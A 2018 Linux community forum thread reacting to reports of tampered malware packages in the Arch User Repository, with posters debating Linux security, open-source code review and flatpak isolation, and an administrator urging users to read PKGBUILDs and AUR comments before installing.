Malware in the AUR
Welcome, Guest.

Author Topic: Malware in the AUR  (Read 171 times)

Offline Siva

  • Staff Member
  • ********
  • Posts: 20
  • Country: 00
  • "We're all mad here"
Malware in the AUR
« on: July 12, 2018, 04:28:00 AM »
Three programs were tampered wuth by someone named xeactor.
You are not allowed to view links. Register or Login

Offline CwF

  • Full Member
  • ****
  • Posts: 210
  • Country: us
Re: Malware in the AUR
« Reply #1 on: July 12, 2018, 03:44:26 PM »
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, it's entire history of safety means nothing.
And who's looking for a better pdf reader?

Offline Kalthrix

  • Staff Member
  • ********
  • Posts: 966
  • Country: us
Re: Re: Malware in the AUR
« Reply #2 on: July 12, 2018, 07:56:56 PM »
You are not allowed to view links. Register or Login
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, it's entire history of safety means nothing.
And who's looking for a better pdf reader?

Honestly, the only use I have found for the older "acroread (Adobe Reader 9)" package is to display fillable PDF documents that actively refuse to display on any other PDF editor/viewer. You'll see this a lot with state, court, and federal documents. Some businesses working in realty and financial will use the same. It's irritating to say in the least. Not sure if the intent was to reach that incredibly small crowd that still use the package, to test waters to gauge reaction time from the community considering it is a rarely used package, or if the intent was to target those that prefer to use commercial software vs the open source alternatives (although old) due to familiarity.

I'll never understand people that do this. If it is just to spite others or what their actual motivation is? Why not either improve the package or make one that is better? Adobe obviously has no interest in maintaining it or we would have seen Reader or Acrobat DC brought to Linux already.
You are not allowed to view links. Register or Login

Offline fraterchaos

  • Mandelbrot Metal Mayhem!
  • Staff Member
  • ********
  • Posts: 710
  • Country: us
  • Never underestimate the power of human stupidity
    • Skype
Re: Re: Malware in the AUR
« Reply #3 on: July 12, 2018, 10:25:59 PM »
You are not allowed to view links. Register or Login
I continue to be put off by the "Linux is inherently safer" proponents.
Hogwash.
Nearly all issues start with a user click. Linux's are simply not a target. Like a hunter taking out a squirrel with a high powered rifle, not going to happen. When that squirrel morphs into an elk, it's entire history of safety means nothing.
And who's looking for a better pdf reader?

the one way in which linux can be safer is that being open source, it means a lot more people are going over the code that is added... so it's more likely that malware will be caught sooner. And when it's caught it is nearly always addressed more quickly than you could expect MS or Apple to do it. They only have a profit motive.

Not saying it's perfect, open source also enables more people to be able to add suspicious code from the start... but it still has a better chance of getting caught more quickly, I think.
Science, like Nature, must also be tamed... with a view towards it's preservation. -- Rush

Offline CwF

  • Full Member
  • ****
  • Posts: 210
  • Country: us
Re: Re: Re: Malware in the AUR
« Reply #4 on: July 13, 2018, 02:59:10 PM »
You are not allowed to view links. Register or Login
... but it still has a better chance of getting caught more quickly, I think.
I think that's generally right. That's why I'm happy with apt-get stable debian, perhaps the safest around. Once we start after the most current, or allow 'user content' or ppa's, or encourage something idiotic like flatpacks, trust ends. Even compiling from source is suspect, like you actually reviewed the code. I did say a user click. Look how stuff is getting into android. Once 'stable' is extended into 'want' we let our guard down.

I'm aware of the propriety pdf stuff. It's sad the government is so stupid in it's conflicts of interest. I'm still amazed some states went through the silverlight phase. It just proves most aren't paying attention..

Since the potential audience (target) was tiny in this case I suspect a grey hat demonstration.

Offline Siva

  • Staff Member
  • ********
  • Posts: 20
  • Country: 00
  • "We're all mad here"
Re: Malware in the AUR
« Reply #5 on: July 19, 2018, 12:29:47 PM »
Flatpaks can be safer. For example Openra relies on Mono and Mono adds CA certs to your system.

Installing the flatpak segregates it to it own part of your system.

Offline Spatry

  • Benevolent Dictator
  • Administrator - Sysop
  • **********
  • Posts: 4548
  • Country: us
  • Cup of Linux Founder
    • Cup of Linux
Re: Malware in the AUR
« Reply #6 on: July 19, 2018, 09:18:38 PM »
I cannot stress this enough.... When using yaourt or any other AUR helper, READ THE PKGBUILD! It will tell you what sources it is downloading.... alternatively you can download the AUR snapshot to a temp directory and run makepkg against it.... then you can look into the sources before you install the compiled package to ensure you are not getting any malware.... the AUR is a magnificent tool but it can also be your undoing if you do not exercise a little CARE.

Something I did not think of: if you are installing a package with -bin in the name, odds are you are getting a blob compiled against Ubuntu, Fedora or some other distro... in those cases you do not get the source but if it contains malware there will be comments posted on the AUR page... Always a good idea to read the comments....
"Wipe that NERVOUS expression off of your face, 3PO!" -General Leia Organa SWTLJ